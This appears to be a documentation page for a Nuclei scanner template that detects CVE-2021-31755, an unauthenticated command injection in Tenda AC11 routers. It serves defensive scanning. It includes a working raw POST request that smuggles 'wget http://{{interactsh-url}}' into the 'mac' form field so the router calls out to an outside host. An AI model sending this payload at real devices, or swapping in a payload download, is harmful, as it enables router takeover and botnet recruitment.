Skip to content
Nuclei Templates

Tenda Router AC11 - Remote Command Injection

ID: CVE-2021-31755

Severity: critical

Author: gy741

Tags: cve2021,cve,tenda,rce,oast,router,mirai,kev

Description

Section titled “Description”

Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

YAML Source

Section titled “YAML Source”
id: CVE-2021-31755


info:
  name: Tenda Router AC11 - Remote Command Injection
  author: gy741
  severity: critical
  description: Tenda Router AC11  is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.
  remediation: |
    Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).
  reference:
    - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31755
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
    - https://github.com/Yu3H0/IoT_CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-31755
    cwe-id: CWE-787
    epss-score: 0.97104
    epss-percentile: 0.99781
    cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tenda
    product: ac11_firmware
  tags: cve2021,cve,tenda,rce,oast,router,mirai,kev


http:
  - raw:
      - |
        POST /goform/setmac HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/index.htmlr
        Content-Type: application/x-www-form-urlencoded


        module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a0046304402203e433570e742c9a87229bf98a9bcf5817b9729cd6defea2d48d5d5253b3a645602201545984236af3726aaba0d86f01ec8049efd2ca6067aada665e823ee91d8359f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-31755.yaml"

View on Github